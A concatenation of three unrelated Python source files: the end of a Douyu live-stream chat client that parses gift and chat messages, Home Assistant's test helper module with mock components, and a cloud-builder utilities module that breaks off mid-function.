print '\033[1;36m[信息]\033[0m \033[1m用户\033[0m \033[1;32m[LV %s]\033[0m \033[1;33m%s\033[0m \033[1m送给主播%s个水晶鞋,\033[0m \033[1;31m%s连击\033[0m' % (level, nickname, number, hits)
else:
print '\033[1;36m[信息]\033[0m \033[1m用户\033[0m \033[1;32m[LV %s]\033[0m \033[1;33m%s\033[0m \033[1m送给主播%s个不知啥礼物,\033[0m \033[1;31m%s连击\033[0m' % (level, nickname, number, hits)
print response
elif dtype == 'onlinegift':
nickname = re.search('\/nn@=(.+?)\/ur', response).group(1)
level = re.search('\/level@=(.+?)\/', response).group(1)
sil = re.search('\/sil@=(.+?)\/', response).group(1)
print '\033[1;36m[信息]\033[0m \033[1m用户\033[0m \033[1;32m[LV %s]\033[0m \033[1;33m%s\033[0m \033[1m通过在线领鱼丸获得了%s个酬勤专享鱼丸\033[0m' % (level, nickname, sil)
elif dtype == 'gift_title':
print response
elif dtype == 'bc_buy_deserve':
number, hits = re.search('\/cnt@=(.+?)\/hits@=(.+?)\/', response).groups()
nickname = re.search('@Snick@A=(.+?)@', response).group(1)
level = re.search('\/level@=(.+?)\/', response).group(1)
print '\033[1;36m[信息]\033[0m \033[1m用户\033[0m \033[1;32m[LV %s]\033[0m \033[1;33m%s\033[0m \033[1m送给主播%s个\033[0m\033[1;31m高级酬勤\033[0m' % (level, nickname, number)
elif dtype == 'spbc':
nickname, receiver, giftname, number = re.search('\/sn@=(.+?)\/dn@=(.+)\/gn@=(.+)\/gc@=(.+)\/drid', response).groups()
print '\033[1;36m[信息]\033[0m \033[1;32m土豪\033[0m %s \033[1m送给主播\033[0m \033[1;33m%s\033[0m \033[1m%s个\033[0m\033[1;31m%s\033[0m' % (nickname, receiver, number, giftname)
elif dtype == 'ranklist':
print response
elif dtype == 'ggbb':
print response
elif dtype == 'donateres':
print response
elif dtype == 'chatmsg':
nickname = re.search('\/nn@=(.+?)\/', response).group(1)
chatmsg = re.search('\/txt@=(.+?)\/', response).group(1)
level = re.search('\/level@=(.+?)\/', response).group(1)
print '\033[1;34m[弹幕]\033[0m \033[1;32m[LV %s]\033[0m \033[1;33m%s:\033[0m \033[1;35m%s\033[0m' % (level, nickname, chatmsg)
elif dtype == 'chatmessage':
nickname = re.search('\/snick@=(.+?)\/cd', response).group(1)
chatmsg = re.search('\/content@=(.+?)\/snick', response).group(1)
try:
level = re.search('\/level@=(.+?)\/', response).group(1)
print '\033[1;34m[弹幕]\033[0m \033[1;32m[LV %s]\033[0m \033[1;33m%s:\033[0m \033[1;35m%s\033[0m' % (level, nickname, chatmsg)
except:
# print response
level = re.search('@Slevel@A=(.+?)@', response).group(1)
print '\033[1;34m[弹幕]\033[0m \033[1;32m[LV %s]\033[0m \033[1;33m%s:\033[0m \033[1;35m%s\033[0m' % (level, nickname, chatmsg)
else:
print '\033[1;31m[错误] 主播有毒,这条消息未能解析\033[0m'
print response
def send_joingroup_msg(self):
data = 'type@=joingroup/rid@=%s/gid@=%s/' % (self.rid, self.gid)
self.danmaku_socket.sendall(self.pack_data(data))
def send_loginreq_msg(self):
data = 'type@=loginreq/username@=/password@=/roomid@=%s/' % self.rid
self.danmaku_socket.sendall(self.pack_data(data))
def send_auth_loginreq_msg(self):
self.devid = str(uuid.uuid4()).replace('-', '')
self.rt = int(time.time())
self.vk = hashlib.md5(str(self.rt) + '7oE9nPEG9xXV69phU31FYCLUagKeYtsF' + self.devid).hexdigest()
data = 'type@=loginreq/username@=/password@=/roomid@=%s/ct@=0/devid@=%s/rt@=%s/vk@=%s/ver@=20150929/' % (self.rid, self.devid, self.rt, self.vk)
self.danmaku_auth_socket.sendall(self.pack_data(data))
def send_qrl_msg(self):
data = 'type@=qrl/rid@=%s/' % self.rid
self.danmaku_auth_socket.sendall(self.pack_data(data))
def send_auth_keeplive_msg(self):
data = 'type@=keepalive/tick@=%s/vbw@=0/k@=19beba41da8ac2b4c7895a66cab81e23/' % int(time.time())
self.danmaku_auth_socket.sendall(self.pack_data(data))
def send_keeplive_msg(self):
data = 'type@=keepalive/tick@=%s/' % int(time.time())
self.danmaku_socket.sendall(self.pack_data(data))
def keeplive(self):
while True:
self.send_auth_keeplive_msg()
self.send_keeplive_msg()
time.sleep(60)
def pack_data(self, data):
length = {'len': len(data)}
return struct.pack('12B{0[len]}sB'.format(length), length['len'] + 9, 0x00, 0x00, 0x00, length['len'] + 9, 0x00, 0x00, 0x00, 0xb1, 0x02, 0x00, 0x00, data, 0x00)
if __name__ == '__main__':
rnumber, rooms = welcome()
client = DouyuDanmakuClient(rnumber, rooms)
client.run()
|
common.py
|
"""Test the helper method for writing tests."""
import asyncio
import functools as ft
import json
import logging
import os
import sys
import threading
from collections import OrderedDict
from contextlib import contextmanager
from datetime import timedelta
from io import StringIO
from unittest.mock import MagicMock, Mock, patch
import homeassistant.util.dt as date_util
import homeassistant.util.yaml as yaml
from homeassistant import auth, config_entries, core as ha
from homeassistant.auth import (
models as auth_models, auth_store, providers as auth_providers,
permissions as auth_permissions)
from homeassistant.auth.permissions import system_policies
from homeassistant.components import mqtt, recorder
from homeassistant.config import async_process_component_config
from homeassistant.const import (
ATTR_DISCOVERED, ATTR_SERVICE, DEVICE_DEFAULT_NAME,
EVENT_HOMEASSISTANT_CLOSE, EVENT_PLATFORM_DISCOVERED, EVENT_STATE_CHANGED,
EVENT_TIME_CHANGED, SERVER_PORT, STATE_ON, STATE_OFF)
from homeassistant.helpers import (
area_registry, device_registry, entity, entity_platform, entity_registry,
intent, restore_state, storage)
from homeassistant.setup import async_setup_component, setup_component
from homeassistant.util.unit_system import METRIC_SYSTEM
from homeassistant.util.async_ import (
run_callback_threadsafe, run_coroutine_threadsafe)
_TEST_INSTANCE_PORT = SERVER_PORT
_LOGGER = logging.getLogger(__name__)
INSTANCES = []
CLIENT_ID = 'https://example.com/app'
CLIENT_REDIRECT_URI = 'https://example.com/app/callback'
def threadsafe_callback_factory(func):
"""Create threadsafe functions out of callbacks.
Callback needs to have `hass` as first argument.
"""
@ft.wraps(func)
def threadsafe(*args, **kwargs):
"""Call func threadsafe."""
hass = args[0]
return run_callback_threadsafe(
hass.loop, ft.partial(func, *args, **kwargs)).result()
return threadsafe
def threadsafe_coroutine_factory(func):
"""Create threadsafe functions out of coroutine.
Callback needs to have `hass` as first argument.
"""
@ft.wraps(func)
def threadsafe(*args, **kwargs):
"""Call func threadsafe."""
hass = args[0]
return run_coroutine_threadsafe(
func(*args, **kwargs), hass.loop).result()
return threadsafe
def get_test_config_dir(*add_path):
"""Return a path to a test config dir."""
return os.path.join(os.path.dirname(__file__), 'testing_config', *add_path)
def get_test_home_assistant():
"""Return a Home Assistant object pointing at test config directory."""
if sys.platform == "win32":
loop = asyncio.ProactorEventLoop()
else:
loop = asyncio.new_event_loop()
hass = loop.run_until_complete(async_test_home_assistant(loop))
stop_event = threading.Event()
def run_loop():
"""Run event loop."""
# pylint: disable=protected-access
loop._thread_ident = threading.get_ident()
loop.run_forever()
stop_event.set()
orig_stop = hass.stop
def start_hass(*mocks):
"""Start hass."""
run_coroutine_threadsafe(hass.async_start(), loop=hass.loop).result()
def stop_hass():
"""Stop hass."""
orig_stop()
stop_event.wait()
loop.close()
hass.start = start_hass
hass.stop = stop_hass
threading.Thread(name="LoopThread", target=run_loop, daemon=False).start()
return hass
# pylint: disable=protected-access
async def async_test_home_assistant(loop):
"""Return a Home Assistant object pointing at test config dir."""
hass = ha.HomeAssistant(loop)
hass.config.async_load = Mock()
store = auth_store.AuthStore(hass)
hass.auth = auth.AuthManager(hass, store, {}, {})
ensure_auth_manager_loaded(hass.auth)
INSTANCES.append(hass)
orig_async_add_job = hass.async_add_job
orig_async_add_executor_job = hass.async_add_executor_job
orig_async_create_task = hass.async_create_task
def async_add_job(target, *args):
"""Add job."""
if isinstance(target, Mock):
return mock_coro(target(*args))
return orig_async_add_job(target, *args)
def async_add_executor_job(target, *args):
"""Add executor job."""
if isinstance(target, Mock):
return mock_coro(target(*args))
return orig_async_add_executor_job(target, *args)
def async_create_task(coroutine):
"""Create task."""
if isinstance(coroutine, Mock):
return mock_coro()
return orig_async_create_task(coroutine)
hass.async_add_job = async_add_job
hass.async_add_executor_job = async_add_executor_job
hass.async_create_task = async_create_task
hass.config.location_name = 'test home'
hass.config.config_dir = get_test_config_dir()
hass.config.latitude = 32.87336
hass.config.longitude = -117.22743
hass.config.elevation = 0
hass.config.time_zone = date_util.get_time_zone('US/Pacific')
hass.config.units = METRIC_SYSTEM
hass.config.skip_pip = True
hass.config_entries = config_entries.ConfigEntries(hass, {})
hass.config_entries._entries = []
hass.config_entries._store._async_ensure_stop_listener = lambda: None
hass.state = ha.CoreState.running
# Mock async_start
orig_start = hass.async_start
async def mock_async_start():
"""Start the mocking."""
# We only mock time during tests and we want to track tasks
with patch('homeassistant.core._async_create_timer'), \
patch.object(hass, 'async_stop_track_tasks'):
await orig_start()
hass.async_start = mock_async_start
@ha.callback
def clear_instance(event):
"""Clear global instance."""
INSTANCES.remove(hass)
hass.bus.async_listen_once(EVENT_HOMEASSISTANT_CLOSE, clear_instance)
return hass
def get_test_instance_port():
"""Return unused port for running test instance.
The socket that holds the default port does not get released when we stop
HA in a different test case. Until I have figured out what is going on,
let's run each test on a different port.
"""
global _TEST_INSTANCE_PORT
_TEST_INSTANCE_PORT += 1
return _TEST_INSTANCE_PORT
@ha.callback
def async_mock_service(hass, domain, service, schema=None):
"""Set up a fake service & return a calls log list to this service."""
calls = []
@ha.callback
def mock_service_log(call): # pylint: disable=unnecessary-lambda
"""Mock service call."""
calls.append(call)
hass.services.async_register(
domain, service, mock_service_log, schema=schema)
return calls
mock_service = threadsafe_callback_factory(async_mock_service)
@ha.callback
def async_mock_intent(hass, intent_typ):
"""Set up a fake intent handler."""
intents = []
class MockIntentHandler(intent.IntentHandler):
intent_type = intent_typ
@asyncio.coroutine
def async_handle(self, intent):
"""Handle the intent."""
intents.append(intent)
return intent.create_response()
intent.async_register(hass, MockIntentHandler())
return intents
@ha.callback
def async_fire_mqtt_message(hass, topic, payload, qos=0, retain=False):
"""Fire the MQTT message."""
if isinstance(payload, str):
payload = payload.encode('utf-8')
msg = mqtt.Message(topic, payload, qos, retain)
hass.async_run_job(hass.data['mqtt']._mqtt_on_message, None, None, msg)
fire_mqtt_message = threadsafe_callback_factory(async_fire_mqtt_message)
@ha.callback
def async_fire_time_changed(hass, time):
"""Fire a time changes event."""
hass.bus.async_fire(EVENT_TIME_CHANGED, {'now': date_util.as_utc(time)})
fire_time_changed = threadsafe_callback_factory(async_fire_time_changed)
def fire_service_discovered(hass, service, info):
"""Fire the MQTT message."""
hass.bus.fire(EVENT_PLATFORM_DISCOVERED, {
ATTR_SERVICE: service,
ATTR_DISCOVERED: info
})
def load_fixture(filename):
"""Load a fixture."""
path = os.path.join(os.path.dirname(__file__), 'fixtures', filename)
with open(path, encoding='utf-8') as fptr:
return fptr.read()
def mock_state_change_event(hass, new_state, old_state=None):
"""Mock state change envent."""
event_data = {
'entity_id': new_state.entity_id,
'new_state': new_state,
}
if old_state:
event_data['old_state'] = old_state
hass.bus.fire(EVENT_STATE_CHANGED, event_data, context=new_state.context)
@asyncio.coroutine
def async_mock_mqtt_component(hass, config=None):
"""Mock the MQTT component."""
if config is None:
config = {mqtt.CONF_BROKER: 'mock-broker'}
with patch('paho.mqtt.client.Client') as mock_client:
mock_client().connect.return_value = 0
mock_client().subscribe.return_value = (0, 0)
mock_client().unsubscribe.return_value = (0, 0)
mock_client().publish.return_value = (0, 0)
result = yield from async_setup_component(hass, mqtt.DOMAIN, {
mqtt.DOMAIN: config
})
assert result
hass.data['mqtt'] = MagicMock(spec_set=hass.data['mqtt'],
wraps=hass.data['mqtt'])
return hass.data['mqtt']
mock_mqtt_component = threadsafe_coroutine_factory(async_mock_mqtt_component)
@ha.callback
def mock_component(hass, component):
"""Mock a component is setup."""
if component in hass.config.components:
AssertionError("Component {} is already setup".format(component))
hass.config.components.add(component)
def mock_registry(hass, mock_entries=None):
"""Mock the Entity Registry."""
registry = entity_registry.EntityRegistry(hass)
registry.entities = mock_entries or OrderedDict()
async def _get_reg():
return registry
hass.data[entity_registry.DATA_REGISTRY] = \
hass.loop.create_task(_get_reg())
return registry
def mock_area_registry(hass, mock_entries=None):
"""Mock the Area Registry."""
registry = area_registry.AreaRegistry(hass)
registry.areas = mock_entries or OrderedDict()
async def _get_reg():
return registry
hass.data[area_registry.DATA_REGISTRY] = \
hass.loop.create_task(_get_reg())
return registry
def mock_device_registry(hass, mock_entries=None):
"""Mock the Device Registry."""
registry = device_registry.DeviceRegistry(hass)
registry.devices = mock_entries or OrderedDict()
async def _get_reg():
return registry
hass.data[device_registry.DATA_REGISTRY] = \
hass.loop.create_task(_get_reg())
return registry
class MockGroup(auth_models.Group):
"""Mock a group in Home Assistant."""
def __init__(self, id=None, name='Mock Group',
policy=system_policies.ADMIN_POLICY):
"""Mock a group."""
kwargs = {
'name': name,
'policy': policy,
}
if id is not None:
kwargs['id'] = id
super().__init__(**kwargs)
def add_to_hass(self, hass):
"""Test helper to add entry to hass."""
return self.add_to_auth_manager(hass.auth)
def add_to_auth_manager(self, auth_mgr):
"""Test helper to add entry to hass."""
ensure_auth_manager_loaded(auth_mgr)
auth_mgr._store._groups[self.id] = self
return self
class MockUser(auth_models.User):
"""Mock a user in Home Assistant."""
def __init__(self, id=None, is_owner=False, is_active=True,
name='Mock User', system_generated=False, groups=None):
"""Initialize mock user."""
kwargs = {
'is_owner': is_owner,
'is_active': is_active,
'name': name,
'system_generated': system_generated,
'groups': groups or [],
'perm_lookup': None,
}
if id is not None:
kwargs['id'] = id
super().__init__(**kwargs)
def add_to_hass(self, hass):
"""Test helper to add entry to hass."""
return self.add_to_auth_manager(hass.auth)
def add_to_auth_manager(self, auth_mgr):
"""Test helper to add entry to hass."""
ensure_auth_manager_loaded(auth_mgr)
auth_mgr._store._users[self.id] = self
return self
def mock_policy(self, policy):
"""Mock a policy for a user."""
self._permissions = auth_permissions.PolicyPermissions(
policy, self.perm_lookup)
async def register_auth_provider(hass, config):
"""Register an auth provider."""
provider = await auth_providers.auth_provider_from_config(
hass, hass.auth._store, config)
assert provider is not None, 'Invalid config specified'
key = (provider.type, provider.id)
providers = hass.auth._providers
if key in providers:
raise ValueError('Provider already registered')
providers[key] = provider
return provider
@ha.callback
def ensure_auth_manager_loaded(auth_mgr):
"""Ensure an auth manager is considered loaded."""
store = auth_mgr._store
if store._users is None:
store._set_defaults()
class MockModule:
"""Representation of a fake module."""
# pylint: disable=invalid-name
def __init__(self, domain=None, dependencies=None, setup=None,
requirements=None, config_schema=None, platform_schema=None,
platform_schema_base=None, async_setup=None,
async_setup_entry=None, async_unload_entry=None,
async_migrate_entry=None):
"""Initialize the mock module."""
self.__name__ = 'homeassistant.components.{}'.format(domain)
self.DOMAIN = domain
self.DEPENDENCIES = dependencies or []
self.REQUIREMENTS = requirements or []
if config_schema is not None:
self.CONFIG_SCHEMA = config_schema
if platform_schema is not None:
self.PLATFORM_SCHEMA = platform_schema
if platform_schema_base is not None:
self.PLATFORM_SCHEMA_BASE = platform_schema_base
if setup is not None:
# We run this in executor, wrap it in function
self.setup = lambda *args: setup(*args)
if async_setup is not None:
self.async_setup = async_setup
if setup is None and async_setup is None:
self.async_setup = mock_coro_func(True)
if async_setup_entry is not None:
self.async_setup_entry = async_setup_entry
if async_unload_entry is not None:
self.async_unload_entry = async_unload_entry
if async_migrate_entry is not None:
self.async_migrate_entry = async_migrate_entry
class MockPlatform:
"""Provide a fake platform."""
__name__ = "homeassistant.components.light.bla"
# pylint: disable=invalid-name
def __init__(self, setup_platform=None, dependencies=None,
platform_schema=None, async_setup_platform=None,
async_setup_entry=None, scan_interval=None):
"""Initialize the platform."""
self.DEPENDENCIES = dependencies or []
if platform_schema is not None:
self.PLATFORM_SCHEMA = platform_schema
if scan_interval is not None:
self.SCAN_INTERVAL = scan_interval
if setup_platform is not None:
# We run this in executor, wrap it in function
self.setup_platform = lambda *args: setup_platform(*args)
if async_setup_platform is not None:
self.async_setup_platform = async_setup_platform
if async_setup_entry is not None:
self.async_setup_entry = async_setup_entry
if setup_platform is None and async_setup_platform is None:
self.async_setup_platform = mock_coro_func()
class MockEntityPlatform(entity_platform.EntityPlatform):
"""Mock class with some mock defaults."""
def __init__(
self, hass,
logger=None,
domain='test_domain',
platform_name='test_platform',
platform=None,
scan_interval=timedelta(seconds=15),
entity_namespace=None,
async_entities_added_callback=lambda: None
):
"""Initialize a mock entity platform."""
if logger is None:
logger = logging.getLogger('homeassistant.helpers.entity_platform')
# Otherwise the constructor will blow up.
if (isinstance(platform, Mock) and
isinstance(platform.PARALLEL_UPDATES, Mock)):
platform.PARALLEL_UPDATES = 0
super().__init__(
hass=hass,
logger=logger,
domain=domain,
platform_name=platform_name,
platform=platform,
scan_interval=scan_interval,
entity_namespace=entity_namespace,
async_entities_added_callback=async_entities_added_callback,
)
class MockToggleDevice(entity.ToggleEntity):
"""Provide a mock toggle device."""
def __init__(self, name, state):
"""Initialize the mock device."""
self._name = name or DEVICE_DEFAULT_NAME
self._state = state
self.calls = []
@property
def name(self):
"""Return the name of the device if any."""
self.calls.append(('name', {}))
return self._name
@property
def state(self):
"""Return the name of the device if any."""
self.calls.append(('state', {}))
return self._state
@property
def is_on(self):
"""Return true if device is on."""
self.calls.append(('is_on', {}))
return self._state == STATE_ON
def turn_on(self, **kwargs):
"""Turn the device on."""
self.calls.append(('turn_on', kwargs))
self._state = STATE_ON
def turn_off(self, **kwargs):
"""Turn the device off."""
self.calls.append(('turn_off', kwargs))
self._state = STATE_OFF
def last_call(self, method=None):
"""Return the last call."""
if not self.calls:
return None
if method is None:
return self.calls[-1]
try:
return next(call for call in reversed(self.calls)
if call[0] == method)
except StopIteration:
return None
class MockConfigEntry(config_entries.ConfigEntry):
"""Helper for creating config entries that adds some defaults."""
def __init__(self, *, domain='test', data=None, version=1, entry_id=None,
source=config_entries.SOURCE_USER, title='Mock Title',
state=None,
connection_class=config_entries.CONN_CLASS_UNKNOWN):
"""Initialize a mock config entry."""
kwargs = {
'entry_id': entry_id or 'mock-id',
'domain': domain,
'data': data or {},
'version': version,
'title': title,
'connection_class': connection_class,
}
if source is not None:
kwargs['source'] = source
if state is not None:
kwargs['state'] = state
super().__init__(**kwargs)
def add_to_hass(self, hass):
"""Test helper to add entry to hass."""
hass.config_entries._entries.append(self)
def add_to_manager(self, manager):
"""Test helper to add entry to entry manager."""
manager._entries.append(self)
def patch_yaml_files(files_dict, endswith=True):
"""Patch load_yaml with a dictionary of yaml files."""
# match using endswith, start search with longest string
matchlist = sorted(list(files_dict.keys()), key=len) if endswith else []
def mock_open_f(fname, **_):
"""Mock open() in the yaml module, used by load_yaml."""
# Return the mocked file on full match
if fname in files_dict:
_LOGGER.debug("patch_yaml_files match %s", fname)
res = StringIO(files_dict[fname])
setattr(res, 'name', fname)
return res
# Match using endswith
for ends in matchlist:
if fname.endswith(ends):
_LOGGER.debug("patch_yaml_files end match %s: %s", ends, fname)
res = StringIO(files_dict[ends])
setattr(res, 'name', fname)
return res
# Fallback for hass.components (i.e. services.yaml)
if 'homeassistant/components' in fname:
_LOGGER.debug("patch_yaml_files using real file: %s", fname)
return open(fname, encoding='utf-8')
# Not found
raise FileNotFoundError("File not found: {}".format(fname))
return patch.object(yaml, 'open', mock_open_f, create=True)
def mock_coro(return_value=None, exception=None):
"""Return a coro that returns a value or raise an exception."""
return mock_coro_func(return_value, exception)()
def mock_coro_func(return_value=None, exception=None):
"""Return a method to create a coro function that returns a value."""
@asyncio.coroutine
def coro(*args, **kwargs):
"""Fake coroutine."""
if exception:
raise exception
return return_value
return coro
@contextmanager
def assert_setup_component(count, domain=None):
"""Collect valid configuration from setup_component.
- count: The amount of valid platforms that should be setup
- domain: The domain to count is optional. It can be automatically
determined most of the time
Use as a context manager around setup.setup_component
with assert_setup_component(0) as result_config:
setup_component(hass, domain, start_config)
# using result_config is optional
"""
config = {}
@ha.callback
def mock_psc(hass, config_input, domain):
"""Mock the prepare_setup_component to capture config."""
res = async_process_component_config(
hass, config_input, domain)
config[domain] = None if res is None else res.get(domain)
_LOGGER.debug("Configuration for %s, Validated: %s, Original %s",
domain, config[domain], config_input.get(domain))
return res
assert isinstance(config, dict)
with patch('homeassistant.config.async_process_component_config',
mock_psc):
yield config
if domain is None:
assert len(config) == 1, ('assert_setup_component requires DOMAIN: {}'
.format(list(config.keys())))
domain = list(config.keys())[0]
res = config.get(domain)
res_len = 0 if res is None else len(res)
assert res_len == count, 'setup_component failed, expected {} got {}: {}' \
.format(count, res_len, res)
def init_recorder_component(hass, add_config=None):
"""Initialize the recorder."""
config = dict(add_config) if add_config else {}
config[recorder.CONF_DB_URL] = 'sqlite://' # In memory DB
with patch('homeassistant.components.recorder.migration.migrate_schema'):
assert setup_component(hass, recorder.DOMAIN,
{recorder.DOMAIN: config})
assert recorder.DOMAIN in hass.config.components
_LOGGER.info("In-memory recorder successfully started")
def mock_restore_cache(hass, states):
"""Mock the DATA_RESTORE_CACHE."""
key = restore_state.DATA_RESTORE_STATE_TASK
data = restore_state.RestoreStateData(hass)
now = date_util.utcnow()
data.last_states = {
state.entity_id: restore_state.StoredState(state, now)
for state in states}
_LOGGER.debug('Restore cache: %s', data.last_states)
assert len(data.last_states) == len(states), \
"Duplicate entity_id? {}".format(states)
async def get_restore_state_data() -> restore_state.RestoreStateData:
return data
# Patch the singleton task in hass.data to return our new RestoreStateData
hass.data[key] = hass.async_create_task(get_restore_state_data())
class MockDependency:
"""Decorator to mock install a dependency."""
def __init__(self, root, *args):
"""Initialize decorator."""
self.root = root
self.submodules = args
def __enter__(self):
"""Start mocking."""
def resolve(mock, path):
"""Resolve a mock."""
if not path:
return mock
return resolve(getattr(mock, path[0]), path[1:])
base = MagicMock()
to_mock = {
"{}.{}".format(self.root, tom): resolve(base, tom.split('.'))
for tom in self.submodules
}
to_mock[self.root] = base
self.patcher = patch.dict('sys.modules', to_mock)
self.patcher.start()
return base
def __exit__(self, *exc):
"""Stop mocking."""
self.patcher.stop()
return False
def __call__(self, func):
"""Apply decorator."""
def run_mocked(*args, **kwargs):
"""Run with mocked dependencies."""
with self as base:
args = list(args) + [base]
func(*args, **kwargs)
return run_mocked
class MockEntity(entity.Entity):
"""Mock Entity class."""
def __init__(self, **values):
"""Initialize an entity."""
self._values = values
if 'entity_id' in values:
self.entity_id = values['entity_id']
@property
def name(self):
"""Return the name of the entity."""
return self._handle('name')
@property
def should_poll(self):
"""Return the ste of the polling."""
return self._handle('should_poll')
@property
def unique_id(self):
"""Return the unique ID of the entity."""
return self._handle('unique_id')
@property
def available(self):
"""Return True if entity is available."""
return self._handle('available')
@property
def device_info(self):
"""Info how it links to a device."""
return self._handle('device_info')
def _handle(self, attr):
"""Return attribute value."""
if attr in self._values:
return self._values[attr]
return getattr(super(), attr)
@contextmanager
def mock_storage(data=None):
"""Mock storage.
Data is a dict {'key': {'version': version, 'data': data}}
Written data will be converted to JSON to ensure JSON parsing works.
"""
if data is None:
data = {}
orig_load = storage.Store._async_load
async def mock_async_load(store):
"""Mock version of load."""
if store._data is None:
# No data to load
if store.key not in data:
return None
mock_data = data.get(store.key)
if 'data' not in mock_data or 'version' not in mock_data:
_LOGGER.error('Mock data needs "version" and "data"')
raise ValueError('Mock data needs "version" and "data"')
store._data = mock_data
# Route through original load so that we trigger migration
loaded = await orig_load(store)
_LOGGER.info('Loading data for %s: %s', store.key, loaded)
return loaded
def mock_write_data(store, path, data_to_write):
"""Mock version of write data."""
_LOGGER.info('Writing data to %s: %s', store.key, data_to_write)
# To ensure that the data can be serialized
data[store.key] = json.loads(json.dumps(
data_to_write, cls=store._encoder))
with patch('homeassistant.helpers.storage.Store._async_load',
side_effect=mock_async_load, autospec=True), \
patch('homeassistant.helpers.storage.Store._write_data',
side_effect=mock_write_data, autospec=True):
yield data
async def flush_store(store):
"""Make sure all delayed writes of a store are written."""
if store._data is None:
return
await store._async_handle_write_data()
async def get_system_health_info(hass, domain):
"""Get system health info."""
return await hass.data['system_health']['info'][domain](hass)
|
utils.py
|
# -*- coding: utf8 -*-
from __future__ import print_function
from binascii import hexlify
import collections
import errno
import functools
import itertools
import os
import random
import socket
import string
import sys
import threading
import time
import contextlib2
import futurist
from monotonic import monotonic as now
from oslo_utils import reflection
import paramiko
import plumbum
import six
from paramiko.common import DEBUG
from plumbum.machines.paramiko_machine import ParamikoMachine as SshMachine
import builder as bu
PASS_CHARS = string.ascii_lowercase + string.digits
class BuildHelper(object):
"""Conglomerate of util. things for our to-be/in-progress cloud."""
def __init__(self, cloud, tracker, topo):
self.topo = topo
self.machines = {}
self.tracker = tracker
self.cloud = cloud
self._settings = None
self._exit_stack = contextlib2.ExitStack()
def iter_servers(self):
compute_servers = self.topo['compute']
control_servers = list(self.topo['control'].values())
for server in itertools.chain(compute_servers, control_servers):
yield server
@property
def server_count(self):
return len(list(self.iter_servers()))
def maybe_run(self, pre_state, post_state,
func, func_on_done=None, indent='',
func_name=None, func_details=''):
if not func_details:
func_details = getattr(func, '__doc__', '')
if not func_name:
func_name = reflection.get_callable_name(func)
print("%sActivating function '%s'" % (indent, func_name))
if func_details:
print("%sDetails: '%s'" % (indent, func_details))
applicable_servers = []
for server in self.iter_servers():
if server.builder_state < post_state:
applicable_servers.append(server)
last_result = None
for server in applicable_servers:
server.builder_state = pre_state
self.save_topo()
last_result = func(self, server,
last_result=last_result,
indent=indent + " ")
server.builder_state = post_state
self.save_topo()
if func_on_done is not None and applicable_servers:
func_on_done(self, indent=indent + " ")
print("%sFunction '%s' has finished." % (indent, func_name))
def save_topo(self):
self.tracker['topo'] = self.topo
self.tracker.sync()
@property
def settings(self):
if self._settings is not None:
return self._settings
else:
settings = self.tracker.get("settings", {})
for setting_name in bu.DEF_SETTINGS.keys():
if setting_name not in settings:
settings[setting_name] = bu.DEF_SETTINGS[setting_name]
for setting_name in ['ADMIN_PASSWORD', 'SERVICE_TOKEN',
'SERVICE_PASSWORD', 'RABBIT_PASSWORD']:
if setting_name not in settings:
settings[setting_name] = generate_secret()
self.tracker['settings'] = settings
self.tracker.sync()
self._settings = settings
return self._settings
def iter_server_by_kind(self, kind):
for server in self.iter_servers():
if server.kind == kind:
yield server
def __enter__(self):
return self
def bind_machine(self, server_name, machine):
matched_servers = [server for server in self.iter_servers()
if server.name == server_name]
if not matched_servers:
raise RuntimeError("Can not match ssh machine"
" to unknown server '%s'" % server_name)
self.machines[server_name] = machine
self._exit_stack.callback(machine.close)
def __exit__(self, exc_type, exc_val, exc_tb):
self._exit_stack.close()
class Tracker(collections.MutableMapping):
"""Tracker that tracks data about a single cloud."""
def __init__(self, data, saver):
self._data = data
self._saver = saver
def __setitem__(self, key, value):
self._data[key] = value
def __delitem__(self, key):
del self._data[key]
def __len__(self):
return len(self._data)
def __iter__(self):
return iter(self._data)
def __getitem__(self, key):
return self._data[key]
def sync(self):
self._saver()
class Spinner(object):
SPINNERS = tuple([
u"◐◓◑◒",
u"|/-\\",
u"◴◷◶◵",
u"◳◲◱◰",
])
def __init__(self, message, verbose, delay=0.3):
self.verbose = verbose
self.message = message
self.delay = delay
self._it = itertools.cycle(random.choice(self.SPINNERS))
self._t = None
self._ev = threading.Event()
self._dead = threading.Event()
self._dead.set()
def _runner(self):
message_sent = False
output = False
while not self._ev.is_set():
if not message_sent:
sys.stdout.write(self.message)
sys.stdout.write(" ")
sys.stdout.flush()
message_sent = True
sys.stdout.write(six.next(self._it))
sys.stdout.flush()
self._ev.wait(self.delay)
sys.stdout.write('\b')
sys.stdout.flush()
output = True
if output or message_sent:
sys.stdout.write("\n")
sys.stdout.flush()
self._dead.set()
def start(self):
if not self.verbose and sys.stdout.isatty():
self._dead.clear()
self._ev.clear()
self._t = threading.Thread(target=self._runner)
self._t.daemon = True
self._t.start()
else:
sys.stdout.write(self.message)
sys.stdout.write("...\n")
sys.stdout.flush()
def stop(self):
self._ev.set()
def wait(self):
self._dead.wait()
def __enter__(self):
self.start()
def __exit__(self, exc_type, exc_val, exc_tb):
self.stop()
self.wait()
class RemoteExecutionFailed(Exception):
pass
class RemoteCommand(object):
def __init__(self, cmd, *cmd_args, **kwargs):
self.cmd = cmd
self.cmd_args = cmd_args
self.server = kwargs.get('server')
self.scratch_dir = kwargs.get('scratch_dir')
self.name = " ".join(cmd.formulate())
self.full_name = self.name
if cmd_args:
self.full_name += " "
self.full_name += " ".join([str(a) for a in cmd_args])
@property
def stderr_path(self):
if not self.scratch_dir:
return os.devnull
host = None
if self.server:
host = self.server.name
if not host:
host = self.cmd.machine.host
return os.path.join(self.scratch_dir, "%s.stderr" % host)
@property
def stdout_path(self):
if not self.scratch_dir:
return os.devnull
host = None
if self.server:
host = self.server.name
if not host:
host = self.cmd.machine.host
return os.path.join(self.scratch_dir, "%s.stdout" % host)
def __str__(self):
host = None
if self.server:
try:
host = self.server.hostname
except AttributeError:
host = self.server.name
if not host:
host = self.cmd.machine.host
return "`%s` running on server '%s'" % (self.full_name, host)
def safe_open(path, mode):
safe_make_dir(os.path.dirname(path))
return open(path, mode)
def get_server_ip(server):
for field in ('private_v4', 'accessIPv4'):
ip = server.get(field)
if ip:
return ip
return None
def trim_it(block, max_len, reverse=False):
block_len = len(block)
if not reverse:
block = block[0:max_len]
if block_len > max_len:
block += " (and %sb more)" % (block_len - max_len)
else:
block = "".join(list(reversed(block)))
block = block[0:max_len]
block = "".join(list(reversed(block)))
if block_len > max_len:
block += " (and %sb prior)" % (block_len - max_len)
return block
def run_and_record(remote_cmds, indent="",
err_chop_len=1024, max_workers=None,
verbose=True, on_done=None,
on_start=None):
